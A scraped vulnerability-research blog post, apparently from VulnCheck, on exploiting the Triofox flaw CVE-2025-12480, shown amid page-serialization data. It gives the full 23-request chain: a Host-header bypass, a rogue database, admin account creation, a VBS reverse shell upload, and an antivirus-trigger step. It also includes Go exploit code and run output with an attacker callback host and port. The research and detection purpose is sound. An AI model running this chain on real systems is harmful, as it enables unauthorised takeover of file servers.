environments.",[61,20120,202],{"id":201},[18,20122,20123,20124,1246,20130,1255,20137,59],{},"The VulnCheck research team is always looking for new vulnerabilities to analyze and curate. For more research like this check out our blogs ",[1131,20125,20126],{},[47,20127,20129],{"href":10782,"rel":20128},[51],"Frost Checks First: Selective Exploitation",[1131,20131,20132],{},[47,20133,20136],{"href":20134,"rel":20135},"https:\u002F\u002Fwww.vulncheck.com\u002Fblog\u002Freacting-to-shells-react2shell-variants-ecosystem",[51],"Reacting to Shells: React2Shell Variants and the CVE-2025-55182 Exploit Ecosystem",[1131,20138,20139],{},[47,20140,19437],{"href":19435,"rel":20141},[51],[18,20143,1228,20144,1234,20147,1240,20150,1246,20153,1255,20156,1260],{},[47,20145,1233],{"href":1231,"rel":20146},[51],[47,20148,1239],{"href":1237,"rel":20149},[51],[47,20151,1245],{"href":1243,"rel":20152},[51],[47,20154,1251],{"href":1249,"rel":20155},[51],[47,20157,216],{"href":1258,"rel":20158},[51],{"title":219,"searchDepth":220,"depth":220,"links":20160},[20161,20162,20163,20164,20165],{"id":11272,"depth":220,"text":11273},{"id":20060,"depth":220,"text":20061},{"id":11509,"depth":220,"text":20082},{"id":20110,"depth":220,"text":20111},{"id":201,"depth":220,"text":202},"2025-12-18","Fortinet disclosed two critical vulnerabilities on December 9 that arise from improper cryptographic signature verification and enable remote attackers to bypass SSO login on vulnerable devices. The vulnerabilities are being exploited in the wild.",{"slug":20169},"forticloud-sso-login-bypass","\u002Fblog\u002Fforticloud-sso-login-bypass",{"title":19998,"description":20167},"blog\u002Fforticloud-sso-login-bypass",[1280,242,1279],"tSQuHbGo39cvaHAOg1b7PKOqwV9enA6vhIAcat4kQHM",{"id":20176,"title":10339,"articles":20177,"authors":20183,"body":20185,"date":20166,"description":21157,"extension":234,"image":7,"link":7,"meta":21158,"navigation":237,"path":21160,"seo":21161,"series":7,"stem":21162,"subtype":7,"tags":21163,"__hash__":21164},"blog\u002Fblog\u002Ftriofox-exploit-CVE-2025-12480.md",[20178],{"title":20179,"source":20180,"link":20181,"date":20182},"Malicious Code Executed Through Gladinet Triofox 0-Day Vulnerability Exploited by Hackers","CyberPress","https:\u002F\u002Fcyberpress.org\u002Fgladinet-triofox-0-day-vulnerability\u002F","2025-12-19",[20184],{"name":4410,"avatar":4411,"link":4412,"linkName":4413},{"type":15,"value":20186,"toc":21149},[20187,20190,20193,20208,20212,20219,20228,20231,20235,20256,20259,20262,20268,20271,20286,20289,20300,20303,20307,20310,20313,20316,20322,20329,20335,20338,20349,20352,20358,20368,20374,20377,20383,20386,20389,20393,20400,20403,20549,20552,20569,20572,21094,21098,21101,21107,21116,21118,21129,21146],[263,20188],{":list":20189,"ico":266,"title":20},"[\"CVE-2025-12480 is a critical remote code execution vulnerability in Gladinet Triofox that was exploited as a zero-day by a threat actor tracked as UNC6485.\",\"VulnCheck's Initial Access Intelligence team analyzed the vulnerability, reproduced the attack, and created an original exploit that follows the same attack path and pattern as the real-world adversary.\",\"This blog shares attack observations and implementation details from our exploit, which fully emulates the adversary interaction over more than 20 requests, abuses antivirus configuration as a trigger, and leverages an embedded PostgreSQL server for callbacks. In other words: Exploitation is hard even when it might seem like it's not.\"]",[18,20191,20192],{},"Exploitation can often appear simple when analyzed from a post-exploitation perspective or post-patch release, but much of cybersecurity is about those subtleties that can mask complexity required for real world attacks. It's valuable to look at the seemingly simple exploits that have been developed only up to the minimum standard required for a functional attack and look at the \"just\" statements that hide the complications and choices an attacker makes.",[18,20194,20195,20196,20201,20202,20207],{},"Recently Mandiant Threat Defense identified active exploitation of ",[47,20197,20200],{"href":20198,"rel":20199},"https:\u002F\u002Fcloud.google.com\u002Fblog\u002Ftopics\u002Fthreat-intelligence\u002Ftriofox-vulnerability-cve-2025-12480",[51],"a zero-day in Gladinet's Triofox file-sharing and remote access platform"," that our Initial Access Intelligence team reproduced for our clients. Other researchers also identified that ",[47,20203,20206],{"href":20204,"rel":20205},"https:\u002F\u002Fattackerkb.com\u002Ftopics\u002F5C4wRy6hY7\u002Fcve-2025-12480\u002Frapid7-analysis",[51],"the application shared much functionality (and vulnerabilities) with the Gladinet CentreStack application",". During reproduction and exploit creation, the VulnCheck team made the decision to ignore the bug overlap and instead see if we could reproduce and write an exploit that matched the Mandiant analysis as closely as possible. This turned out to be an excellent case study in how writeups and public analysis can make a complex attack seem simple; as always, however, the details are what matters in real-world exploitation scenarios.",[61,20209,20211],{"id":20210},"triofox-vulnerability-primer","Triofox Vulnerability Primer",[18,20213,20214,20215,20218],{},"The original Mandiant vulnerability ",[47,20216,1017],{"href":20198,"rel":20217},[51]," explains that the vulnerability arises from an incorrect local host header injection that then allows an attacker to reach pages that are use for initial configuration of Triofox. Using the access the writeup states that the attacker reaches the database configuration page, which then leads to the admin account creation page, and a new database and admin account are created by the attacker allowing them access to the administrative user account. Finally, the attacker then modified the Anti-virus configuration to achieve remote code execution.",[18,20220,20221,20222,20224],{},"The analysis provides the following exploitation chain diagram (diagram via Mandiant):",[1823,20223],{},[68,20225],{"alt":20226,"src":20227},"Mandiant summary of exploit chain","\u002Fblog\u002Ftriofox-exploit-cve-2025-12480\u002Ftriofox-mandiant.png",[18,20229,20230],{},"The reason this is interesting is that this is a simplification of the reality of the attack. It is excellent for incident response and detection, but here on the VulnCheck Initial Access Intelligence team, we want shells. This simplification provides us a useful framework to look at some of the decision making steps the attackers had to make and how these simplifications mask the complexity of exploitation.",[61,20232,20234],{"id":20233},"just-reset-the-database","\"Just\" Reset the Database",[18,20236,20237,20238,20241,20242,20245,20246,20248,20249,20251,20252,4606],{},"One of the root cause components of the vulnerability is an authentication bypass that arises from faulty validation when checking whether a request is coming from ",[886,20239,20240],{},"localhost"," in order to allow administrators to reset the settings from the local interface of the server. The developers did not validate whether the host was ",[1131,20243,20244],{},"actually"," the local system, only that the ",[886,20247,6301],{}," header was set to ",[886,20250,20240],{},". What is missing from current public analysis is this very short blurb from the original ",[47,20253,1017],{"href":20254,"rel":20255},"https:\u002F\u002Fcloud.google.com\u002Fblog\u002Ftopics\u002Fthreat-intelligence\u002Ftriofox-vulnerability-cve-2025-12480\u002F",[51],[18,20257,20258],{},"By following the setup process and creating a new database via the AdminDatabase.aspx page, access is granted to the admin initialization page, AdminAccount.aspx, which then redirects to the InitAccount.aspx page to create a new admin account.",[18,20260,20261],{},"The analysis here is technically correct, but does not elaborate on a few critical details that turn out to be real issues for weaponizing an exploit. First, if the target Triofox installation is using the default embedded database, re-selecting that option does not reconfigure the database and does not allow for an attacker to reset the admin credentials. Second, when the attacker selects the other databases, they must actually have a database accessible for the Triofox server to reach out to and utilize.",[18,20263,20264],{},[68,20265],{"alt":20266,"src":20267},"Triofox database options","\u002Fblog\u002Ftriofox-exploit-cve-2025-12480\u002Ftriofox-database-options.jpg",[18,20269,20270],{},"Our testing revealed that in the default configuration an attacker could not rely on the database configuration page to indicate the default configuration, meaning that a password reset action would not be available to an attacker using the Triofox embedded database — meaning that the attacker found a different way around this, only targeted systems that used the external database configuration, or deployed their own database systems for configuration.",[18,20272,20273,20274,20279,20280,20285],{},"Since we wanted to reproduce the same path to remote code execution as ",[47,20275,20278],{"href":20276,"rel":20277},"https:\u002F\u002Fconsole.vulncheck.com\u002Fthreat-actor\u002Func6485",[51],"UNC6485",", this presented us with a problem. How could we make this exploit work without having to set up a database? Answer: We didn't, and instead we embedded an entire PostgreSQL server configuration in our go-exploit artifact via the Go ",[47,20281,20284],{"href":20282,"rel":20283},"https:\u002F\u002Fgithub.com\u002Ffergusstrange\u002Fembedded-postgres\u002F",[51],"embedded-postgres"," package!",[18,20287,20288],{},"Assuming the attacker did successfully set up a rogue database server, our team still encountered a few other things that an adversary (or an exploit dev) would have needed to contend with — and it’s still not clear how the attackers approached these in the real world:",[22,20290,20291,20294,20297],{},[25,20292,20293],{},"The database would either be completely reset or no longer configured for the system, leaving it in a dirty state and making the exploitation extremely obvious if anyone attempts to use the system.",[25,20295,20296],{},"Previous database settings and configurations are not able to be trivially restored (with one exception that we will get to later).",[25,20298,20299],{},"Artifacts are created during exploitation that point directly to attacker infrastructure, which might deter an adversary desiring stealth.",[18,20301,20302],{},"If the embedded database was used previously by the application, another call to the database configuration (using the same local host header bypass) would allow for the server to return to the previous configuration state. This allows an attacker to reset the configuration post-exploitation even if the database was changed.",[61,20304,20306],{"id":20305},"just-upload-a-set-of-payloads","\"Just\" Upload a Set of Payloads",[18,20308,20309],{},"The Mandiant analysis also notes that malicious files were uploaded and executed:",[18,20311,20312],{},"To achieve code execution, the attacker logged in using the newly created Admin account. The attacker uploaded malicious files to execute them using the built-in anti-virus feature.",[18,20314,20315],{},"\"Uploaded malicious files\" could mean many things in the context of Triofox. After all, the product supports many upload types and by default does not have enabled shares. When trying to create a network share to follow this part of the attack chain, an attacker would have to create a network share via the following set of options:",[18,20317,20318],{},[68,20319],{"alt":20320,"src":20321},"Triofox local file configuration","\u002Fblog\u002Ftriofox-exploit-cve-2025-12480\u002Ftrifox-share-ntfs.jpg",[18,20323,20324,20325,20328],{},"Reducing infrastructure visibility and other exposures is critical to threat actors wanting to mask their identities, so the most obvious choice would be to select the local folder or share. This is where we hit another obstacle: creation of a local share either requires Triofox permissions or NTFS local inherited permissions. These require either entering local credentials or explicitly giving the Triofox-running user permission (if the NTFS permissions are inherited). Below is an example of what occurs when we attempt to create a new share with inherited permissions to ",[886,20326,20327],{},"C:\\"," and grant all users all permissions:",[18,20330,20331],{},[68,20332],{"alt":20333,"src":20334},"Triofox local file configuration error","\u002Fblog\u002Ftriofox-exploit-cve-2025-12480\u002Ftrifox-share-ntfs-error.jpg",[18,20336,20337],{},"So, we are either missing a step here or the attacker figured out something that wasn't obvious. We need to find a way to get a share, so we tried a few things that all failed:",[22,20339,20340,20343,20346],{},[25,20341,20342],{},"Attempted to use UNC path names to the local host to a location",[25,20344,20345],{},"Created a path we know is world-writable",[25,20347,20348],{},"Created a new Triofox low-privilege user, used only Triofox permissions, and granted access",[18,20350,20351],{},"Not wanting to rely on a cloud instance, we started to investigate if there were any alternatives to using the default share logic. This is when we discovered that Triofox offered a setting to enable \"Personal Home Drives\" that was not enabled by default.",[18,20353,20354],{},[68,20355],{"alt":20356,"src":20357},"Triofox personal home drive configuration page","\u002Fblog\u002Ftriofox-exploit-cve-2025-12480\u002Ftriofox-personal-home-drive.png",[18,20359,20360,20361,20364,20365,20367],{},"Interestingly, and unlike the share settings, the application allows you to configure the home drive to a path and ",[1131,20362,20363],{},"will happily allow omitting a username and password",". Simply setting ",[886,20366,20327],{}," or the Windows drive and leaving the username and password blank will allow the attacker to enable the home drive in a known writable location.",[18,20369,20370],{},[68,20371],{"alt":20372,"src":20373},"Triofox personal home drive post-enablement page","\u002Fblog\u002Ftriofox-exploit-cve-2025-12480\u002Ftriofox-personal-home-drive-enabled.png",[18,20375,20376],{},"Then, visiting the \"My Files\" page in the UI, we can see we now have permissions to the Windows drive and testing shows that we have the expected write and file creation permissions.",[18,20378,20379],{},[68,20380],{"alt":20381,"src":20382},"Successfully accessing Windows C drive from personal home drive","\u002Fblog\u002Ftriofox-exploit-cve-2025-12480\u002Ftriofox-personal-home-success.png",[18,20384,20385],{},"There are, of course, likely other ways to achieve file uploads, but not knowing which one was utilized by the threat actor, we decided to prioritize a path that doesn't require the attacker to configure additional infrastructure or settings.",[18,20387,20388],{},"Now we can upload our payload files and move on to the antivirus configuration modification, which is a “simple” modification of the ESET command line parameters with the caveat that the ESET arguments can only point to a single executable, with no arguments that will be scanned by ESET. We added support for creating a staged VisualBasic reverse HTTP shell and an EXE dropper and moved on to the next steps: functionally completing the attack chain manually through the UI with assistance from a web proxy.",[61,20390,20392],{"id":20391},"just-handle-aspnet-state","\"Just\" Handle ASP.NET State",[18,20394,20395,20396,20399],{},"With the upload and antivirus part of the chain completed, we then moved on to automating the attack and maturing our exploit, which includes ensuring that HTTP requests all chain together properly. This is where another \"just\" rears its head in a way that is common during n-day vulnerability reproduction. ASP.NET is a classic example of a web framework that attempts to keep its state client-side and is infamously annoying because it requires juggling state variables such as our old friend ",[886,20397,20398],{},"__VIEWSTATE",". Each request that requires a state change in ASP.NET-developed applications will often require a multi-request process for manual web interaction, such as clicking a next button or a dropdown menu that generates a large volume of requests that have to be accounted for.",[18,20401,20402],{},"A quick enumeration of the steps shows that this exploit requires roughly 23 HTTP requests to go from authentication bypass to remote code execution. The full workflow for exploitation is the following set of HTTP requests:",[1789,20404,20405,20411,20417,20422,20428,20434,20440,20449,20455,20464,20473,20479,20485,20491,20497,20505,20511,20517,20522,20528,20534,20539,20544],{},[25,20406,20407,20410],{},[886,20408,20409],{},"GET \u002Fmanagement\u002FAdminDatabase.aspx"," - Retrieve admin database reset page with bypass",[25,20412,20413,20416],{},[886,20414,20415],{},"POST \u002Fmanagement\u002FAdminDatabase.aspx"," - Select PSQL",[25,20418,20419,20421],{},[886,20420,20415],{}," - Submit attacker-controlled configuration",[25,20423,20424,20427],{},[886,20425,20426],{},"GET \u002Fmanagement\u002FAdminAccount.aspx"," - Follow redirect to servo endpoints and admin configuration",[25,20429,20430,20433],{},[886,20431,20432],{},"GET \u002Fmanagement\u002Fservo\u002FInitAccount.aspx"," - Retrieve ASP state data for account creation",[25,20435,20436,20439],{},[886,20437,20438],{},"POST \u002Fmanagement\u002Fservo\u002FInitAccount.aspx"," - Create the account",[25,20441,20442,20445,20446],{},[886,20443,20444],{},"POST\u002Fmanagement\u002Fservo\u002FInitAccount.aspx"," - Finalize the account and redirect to ",[886,20447,20448],{},"InitAD",[25,20450,20451,20454],{},[886,20452,20453],{},"GET \u002Fmanagement\u002Fservo\u002FInitAd.aspx"," - ASP state data for AD configuration",[25,20456,20457,20460,20461],{},[886,20458,20459],{},"POST \u002Fmanagement\u002Fservo\u002FInitAd.aspx"," - Select No AD configuration redirect to ",[886,20462,20463],{},"InitSvrs",[25,20465,20466,20469,20470],{},[886,20467,20468],{},"GET \u002Fmanagement\u002Fservo\u002FInitSvrs.aspx"," - Follow redirect to ",[886,20471,20472],{},"ServoCheckout.aspx",[25,20474,20475,20478],{},[886,20476,20477],{},"GET \u002Fmanagement\u002Fservo\u002FServoCheckout.aspx?t=1"," - Commit changes from Checkout and get state\u002Ftoken cookies for authentication",[25,20480,20481,20484],{},[886,20482,20483],{},"GET \u002Fmanagement\u002Fclustermgrconsole"," - Redirect to administrative page. Admin access obtained.",[25,20486,20487,20490],{},[886,20488,20489],{},"GET \u002Fmanagement\u002Fservo\u002FServoHomeDriveEnable.aspx"," - Retrieve the \"Home Drive\" administrative page and ASP state",[25,20492,20493,20496],{},[886,20494,20495],{},"POST \u002Fmanagement\u002Fservo\u002FServoHomeDriveEnable.aspx"," - Select home drive enablement",[25,20498,20499,20501,20502],{},[886,20500,20495],{}," - Set home drive to ",[886,20503,20504],{},"C:",[25,20506,20507,20510],{},[886,20508,20509],{},"PUT \u002Fnamespace\u002Fn.svc\u002Fjsondir\u002F?_rnd=\u003Crandom>"," - Create directory in home drive",[25,20512,20513,20516],{},[886,20514,20515],{},"PUT \u002Fstorage\u002Fproxiedupload.up"," - Create and upload .bat file containing call to VBS payload",[25,20518,20519,20521],{},[886,20520,20515],{}," - Create and upload VBS payload",[25,20523,20524,20527],{},[886,20525,20526],{},"GET \u002Fmanagement\u002FAntiVirus.aspx"," - Retrieve ASP state from antivirus configuration page",[25,20529,20530,20533],{},[886,20531,20532],{},"POST \u002Fmanagement\u002FAntiVirus.aspx"," - Select the edit button and update ASP state",[25,20535,20536,20538],{},[886,20537,20532],{}," - Select ESET AV option",[25,20540,20541,20543],{},[886,20542,20532],{}," - Point ESET target to .bat payload",[25,20545,20546,20548],{},[886,20547,20515],{}," - Upload another file to trigger .bat",[18,20550,20551],{},"And for good measure we also need to use our trick to reset the database at the end of a successful attack, meaning we send 3 additional requests in a successful attack for a grand total of 26 requests to keep state throughout the exploit.",[18,20553,20554,20555,20559,20560,20564,20565,20568],{},"Since we obviously want to reduce the pain of having to manually track state, we updated VulnCheck’s open-source exploitation framework ",[47,20556,20558],{"href":14297,"rel":20557},[51],"go-exploit"," with ",[47,20561,20563],{"href":14297,"rel":20562},[51],"wrote a simple set of ASP.NET state helpers"," to allow a call to ",[886,20566,20567],{},"UpdateState"," that handles the HTML XPath parsing and parameter retrieval automatically. This reduces manual lookups and lets us focus only on the non-ASP.NET state parameters that actually matter for exploitation.",[18,20570,20571],{},"This allows us to use request the pages like any other request, but dynamically update the state on each response, automatically handling the ASP.NET state variables:",[1354,20573,20575],{"className":19022,"code":20574,"language":19024,"meta":219,"style":219},"state := aspnet.State{}\nresp, body, ok := protocol.HTTPSendAndRecvWith(\"GET\", conf.GenerateURL(\"\u002Fmanagement\u002FAdminDatabase.aspx\"), \"\")\nif !ok {\n output.PrintError(\"Could not retrieve to the admin database endpoint\")\n\n return false\n}\n\nstate.Update(body)\n\n\u002F\u002F Now only the parameters that are required can be utilized and no special body parsing\n\u002F\u002F for __VIEWSTATE and friends is required.\np := state.MergeParams(map[string]string{\n \"__EVENTTARGET\": \"ctl00$MainContent$DatabaseType\",\n \"ctl00%24MainContent%24DatabaseType\": \"psql\",\n})\nparams := protocol.CreateRequestParamsEncoded(p)\nheaders[\"Content-Type\"] = \"application\u002Fx-www-form-urlencoded\"\nresp, body, ok = protocol.HTTPSendAndRecvWithHeaders(\"POST\", conf.GenerateURL(\"\u002Fmanagement\u002FAdminDatabase.aspx\"), params, headers)\nif !ok {\n output.PrintError(\"Could not POST to the admin database endpoint\")\n\n return false\n}\n\n\u002F\u002F Update the state from the previous POST response, this time we only want the states and have no content\nstate.Update(body)\nparams := protocol.CreateRequestParamsEncoded(state.AsParams())\nresp, body, ok := protocol.HTTPSendAndRecvWithHeaders(\"POST\", conf.GenerateURL(\"\u002Fmanagement\u002FAdminDatabase.aspx\"), params, headers)\nif !ok {\n output.PrintError(\"Could not POST to the admin database endpoint\")\n\n return false\n}\n",[886,20576,20577,20596,20654,20665,20686,20690,20696,20700,20704,20721,20725,20730,20735,20764,20785,20805,20809,20829,20852,20909,20919,20938,20942,20948,20952,20956,20961,20975,20998,21052,21062,21080,21084,21090],{"__ignoreMap":219},[1373,20578,20579,20582,20585,20588,20590,20593],{"class":1375,"line":1376},[1373,20580,20581],{"class":4640},"state ",[1373,20583,20584],{"class":1397},":=",[1373,20586,20587],{"class":14938}," aspnet",[1373,20589,59],{"class":1383},[1373,20591,20592],{"class":14938},"State",[1373,20594,20595],{"class":1383},"{}\n",[1373,20597,20598,20601,20603,20606,20608,20611,20613,20616,20618,20621,20623,20625,20627,20629,20631,20634,20636,20639,20641,20643,20646,20648,20650,20652],{"class":1375,"line":220},[1373,20599,20600],{"class":4640},"resp",[1373,20602,5437],{"class":1383},[1373,20604,20605],{"class":4640}," body",[1373,20607,5437],{"class":1383},[1373,20609,20610],{"class":4640}," ok ",[1373,20612,20584],{"class":1397},[1373,20614,20615],{"class":4640}," protocol",[1373,20617,59],{"class":1383},[1373,20619,20620],{"class":7297},"HTTPSendAndRecvWith",[1373,20622,1384],{"class":1383},[1373,20624,183],{"class":1387},[1373,20626,6284],{"class":1391},[1373,20628,183],{"class":1387},[1373,20630,5437],{"class":1383},[1373,20632,20633],{"class":4640}," conf",[1373,20635,59],{"class":1383},[1373,20637,20638],{"class":7297},"GenerateURL",[1373,20640,1384],{"class":1383},[1373,20642,183],{"class":1387},[1373,20644,20645],{"class":1391},"\u002Fmanagement\u002FAdminDatabase.aspx",[1373,20647,183],{"class":1387},[1373,20649,15534],{"class":1383},[1373,20651,16579],{"class":1387},[1373,20653,11875],{"class":1383},[1373,20655,20656,20658,20660,20663],{"class":1375,"line":1266},[1373,20657,4637],{"class":4636},[1373,20659,7370],{"class":1397},[1373,20661,20662],{"class":4640},"ok ",[1373,20664,8904],{"class":1383},[1373,20666,20667,20670,20672,20675,20677,20679,20682,20684],{"class":1375,"line":1852},[1373,20668,20669],{"class":4640}," output",[1373,20671,59],{"class":1383},[1373,20673,20674],{"class":7297},"PrintError",[1373,20676,1384],{"class":1383},[1373,20678,183],{"class":1387},[1373,20680,20681],{"class":1391},"Could not retrieve to the admin database endpoint",[1373,20683,183],{"class":1387},[1373,20685,11875],{"class":1383},[1373,20687,20688],{"class":1375,"line":4692},[1373,20689,6520],{"emptyLinePlaceholder":237},[1373,20691,20692,20694],{"class":1375,"line":4724},[1373,20693,7340],{"class":4636},[1373,20695,16195],{"class":14985},[1373,20697,20698],{"class":1375,"line":4756},[1373,20699,1855],{"class":1383},[1373,20701,20702],{"class":1375,"line":4768},[1373,20703,6520],{"emptyLinePlaceholder":237},[1373,20705,20706,20709,20711,20714,20716,20719],{"class":1375,"line":4792},[1373,20707,20708],{"class":4640},"state",[1373,20710,59],{"class":1383},[1373,20712,20713],{"class":7297},"Update",[1373,20715,1384],{"class":1383},[1373,20717,20718],{"class":4640},"body",[1373,20720,11875],{"class":1383},[1373,20722,20723],{"class":1375,"line":4798},[1373,20724,6520],{"emptyLinePlaceholder":237},[1373,20726,20727],{"class":1375,"line":4806},[1373,20728,20729],{"class":4630},"\u002F\u002F Now only the parameters that are required can be utilized and no special body parsing\n",[1373,20731,20732],{"class":1375,"line":4817},[1373,20733,20734],{"class":4630},"\u002F\u002F for __VIEWSTATE and friends is required.\n",[1373,20736,20737,20740,20742,20745,20747,20750,20752,20754,20756,20758,20760,20762],{"class":1375,"line":4825},[1373,20738,20739],{"class":4640},"p ",[1373,20741,20584],{"class":1397},[1373,20743,20744],{"class":4640}," state",[1373,20746,59],{"class":1383},[1373,20748,20749],{"class":7297},"MergeParams",[1373,20751,1384],{"class":1383},[1373,20753,13964],{"class":1397},[1373,20755,7035],{"class":1383},[1373,20757,15752],{"class":7293},[1373,20759,15050],{"class":1383},[1373,20761,15752],{"class":7293},[1373,20763,8904],{"class":1383},[1373,20765,20766,20768,20771,20773,20775,20778,20781,20783],{"class":1375,"line":4835},[1373,20767,19050],{"class":1387},[1373,20769,20770],{"class":1391},"__EVENTTARGET",[1373,20772,183],{"class":1387},[1373,20774,4606],{"class":1383},[1373,20776,20777],{"class":1387}," \"",[1373,20779,20780],{"class":1391},"ctl00$MainContent$DatabaseType",[1373,20782,183],{"class":1387},[1373,20784,9062],{"class":1383},[1373,20786,20787,20789,20792,20794,20796,20798,20801,20803],{"class":1375,"line":4843},[1373,20788,19050],{"class":1387},[1373,20790,20791],{"class":1391},"ctl00%24MainContent%24DatabaseType",[1373,20793,183],{"class":1387},[1373,20795,4606],{"class":1383},[1373,20797,4883],{"class":1387},[1373,20799,20800],{"class":1391},"psql",[1373,20802,183],{"class":1387},[1373,20804,9062],{"class":1383},[1373,20806,20807],{"class":1375,"line":4849},[1373,20808,9809],{"class":1383},[1373,20810,20811,20814,20816,20818,20820,20823,20825,20827],{"class":1375,"line":4877},[1373,20812,20813],{"class":4640},"params ",[1373,20815,20584],{"class":1397},[1373,20817,20615],{"class":4640},[1373,20819,59],{"class":1383},[1373,20821,20822],{"class":7297},"CreateRequestParamsEncoded",[1373,20824,1384],{"class":1383},[1373,20826,18],{"class":4640},[1373,20828,11875],{"class":1383},[1373,20830,20831,20833,20835,20837,20839,20841,20843,20845,20847,20850],{"class":1375,"line":4915},[1373,20832,4740],{"class":4640},[1373,20834,7035],{"class":1383},[1373,20836,183],{"class":1387},[1373,20838,6391],{"class":1391},[1373,20840,183],{"class":1387},[1373,20842,15050],{"class":1383},[1373,20844,8575],{"class":1397},[1373,20846,4883],{"class":1387},[1373,20848,20849],{"class":1391},"application\u002Fx-www-form-urlencoded",[1373,20851,19057],{"class":1387},[1373,20853,20854,20856,20858,20860,20862,20864,20866,20868,20870,20873,20875,20877,20879,20881,20883,20885,20887,20889,20891,20893,20895,20897,20899,20902,20904,20907],{"class":1375,"line":4931},[1373,20855,20600],{"class":4640},[1373,20857,5437],{"class":1383},[1373,20859,20605],{"class":4640},[1373,20861,5437],{"class":1383},[1373,20863,20610],{"class":4640},[1373,20865,5417],{"class":1397},[1373,20867,20615],{"class":4640},[1373,20869,59],{"class":1383},[1373,20871,20872],{"class":7297},"HTTPSendAndRecvWithHeaders",[1373,20874,1384],{"class":1383},[1373,20876,183],{"class":1387},[1373,20878,6946],{"class":1391},[1373,20880,183],{"class":1387},[1373,20882,5437],{"class":1383},[1373,20884,20633],{"class":4640},[1373,20886,59],{"class":1383},[1373,20888,20638],{"class":7297},[1373,20890,1384],{"class":1383},[1373,20892,183],{"class":1387},[1373,20894,20645],{"class":1391},[1373,20896,183],{"class":1387},[1373,20898,15534],{"class":1383},[1373,20900,20901],{"class":4640}," params",[1373,20903,5437],{"class":1383},[1373,20905,20906],{"class":4640}," headers",[1373,20908,11875],{"class":1383},[1373,20910,20911,20913,20915,20917],{"class":1375,"line":4947},[1373,20912,4637],{"class":4636},[1373,20914,7370],{"class":1397},[1373,20916,20662],{"class":4640},[1373,20918,8904],{"class":1383},[1373,20920,20921,20923,20925,20927,20929,20931,20934,20936],{"class":1375,"line":4952},[1373,20922,20669],{"class":4640},[1373,20924,59],{"class":1383},[1373,20926,20674],{"class":7297},[1373,20928,1384],{"class":1383},[1373,20930,183],{"class":1387},[1373,20932,20933],{"class":1391},"Could not POST to the admin database endpoint",[1373,20935,183],{"class":1387},[1373,20937,11875],{"class":1383},[1373,20939,20940],{"class":1375,"line":6776},[1373,20941,6520],{"emptyLinePlaceholder":237},[1373,20943,20944,20946],{"class":1375,"line":6781},[1373,20945,7340],{"class":4636},[1373,20947,16195],{"class":14985},[1373,20949,20950],{"class":1375,"line":7524},[1373,20951,1855],{"class":1383},[1373,20953,20954],{"class":1375,"line":7530},[1373,20955,6520],{"emptyLinePlaceholder":237},[1373,20957,20958],{"class":1375,"line":7546},[1373,20959,20960],{"class":4630},"\u002F\u002F Update the state from the previous POST response, this time we only want the states and have no content\n",[1373,20962,20963,20965,20967,20969,20971,20973],{"class":1375,"line":7571},[1373,20964,20708],{"class":4640},[1373,20966,59],{"class":1383},[1373,20968,20713],{"class":7297},[1373,20970,1384],{"class":1383},[1373,20972,20718],{"class":4640},[1373,20974,11875],{"class":1383},[1373,20976,20977,20979,20981,20983,20985,20987,20989,20991,20993,20996],{"class":1375,"line":7598},[1373,20978,20813],{"class":4640},[1373,20980,20584],{"class":1397},[1373,20982,20615],{"class":4640},[1373,20984,59],{"class":1383},[1373,20986,20822],{"class":7297},[1373,20988,1384],{"class":1383},[1373,20990,20708],{"class":4640},[1373,20992,59],{"class":1383},[1373,20994,20995],{"class":7297},"AsParams",[1373,20997,11781],{"class":1383},[1373,20999,21000,21002,21004,21006,21008,21010,21012,21014,21016,21018,21020,21022,21024,21026,21028,21030,21032,21034,21036,21038,21040,21042,21044,21046,21048,21050],{"class":1375,"line":7615},[1373,21001,20600],{"class":4640},[1373,21003,5437],{"class":1383},[1373,21005,20605],{"class":4640},[1373,21007,5437],{"class":1383},[1373,21009,20610],{"class":4640},[1373,21011,20584],{"class":1397},[1373,21013,20615],{"class":4640},[1373,21015,59],{"class":1383},[1373,21017,20872],{"class":7297},[1373,21019,1384],{"class":1383},[1373,21021,183],{"class":1387},[1373,21023,6946],{"class":1391},[1373,21025,183],{"class":1387},[1373,21027,5437],{"class":1383},[1373,21029,20633],{"class":4640},[1373,21031,59],{"class":1383},[1373,21033,20638],{"class":7297},[1373,21035,1384],{"class":1383},[1373,21037,183],{"class":1387},[1373,21039,20645],{"class":1391},[1373,21041,183],{"class":1387},[1373,21043,15534],{"class":1383},[1373,21045,20901],{"class":4640},[1373,21047,5437],{"class":1383},[1373,21049,20906],{"class":4640},[1373,21051,11875],{"class":1383},[1373,21053,21054,21056,21058,21060],{"class":1375,"line":7635},[1373,21055,4637],{"class":4636},[1373,21057,7370],{"class":1397},[1373,21059,20662],{"class":4640},[1373,21061,8904],{"class":1383},[1373,21063,21064,21066,21068,21070,21072,21074,21076,21078],{"class":1375,"line":7640},[1373,21065,20669],{"class":4640},[1373,21067,59],{"class":1383},[1373,21069,20674],{"class":7297},[1373,21071,1384],{"class":1383},[1373,21073,183],{"class":1387},[1373,21075,20933],{"class":1391},[1373,21077,183],{"class":1387},[1373,21079,11875],{"class":1383},[1373,21081,21082],{"class":1375,"line":7648},[1373,21083,6520],{"emptyLinePlaceholder":237},[1373,21085,21086,21088],{"class":1375,"line":7672},[1373,21087,7340],{"class":4636},[1373,21089,16195],{"class":14985},[1373,21091,21092],{"class":1375,"line":7688},[1373,21093,1855],{"class":1383},[61,21095,21097],{"id":21096},"just-run-the-exploit","Just Run the Exploit",[18,21099,21100],{},"In the end we now have an embedded PostgreSQL server, a new shiny set of ASP.NET session state helper functions, an undocumented path bypass for creating a share, a dream, and an exploit that takes a sum total of 26 HTTP requests. The culmination of this is a full unauthenticated remote code execution exploit that mirrors the attack path of the threat actor:",[1354,21102,21105],{"className":21103,"code":21104,"language":1359},[1357],"poptart@grimm $ .\u002Fbuild\u002Fcve-2025-12480_linux-amd64 -rhost 10.0.0.68 -rport 80 -lhost 10.0.1.10 -lport 1337 -timeout 30 -v -c -e\ntime=2025-11-25T14:24:17.692-07:00 level=STATUS msg=\"Starting target\" index=0 host=10.0.0.68 port=80 ssl=false \"ssl auto\"=false\ntime=2025-11-25T14:24:17.692-07:00 level=STATUS msg=\"Validating Gladinet Triofox target\" host=10.0.0.68 port=80\ntime=2025-11-25T14:24:17.706-07:00 level=SUCCESS msg=\"Target verification succeeded!\" host=10.0.0.68 port=80 verified=true\ntime=2025-11-25T14:24:17.706-07:00 level=STATUS msg=\"Running a version check on the remote target\" host=10.0.0.68 port=80\ntime=2025-11-25T14:24:17.719-07:00 level=VERSION msg=\"The reported version is 16.4.10317.56372\" host=10.0.0.68 port=80 version=16.4.10317.56372\ntime=2025-11-25T14:24:17.719-07:00 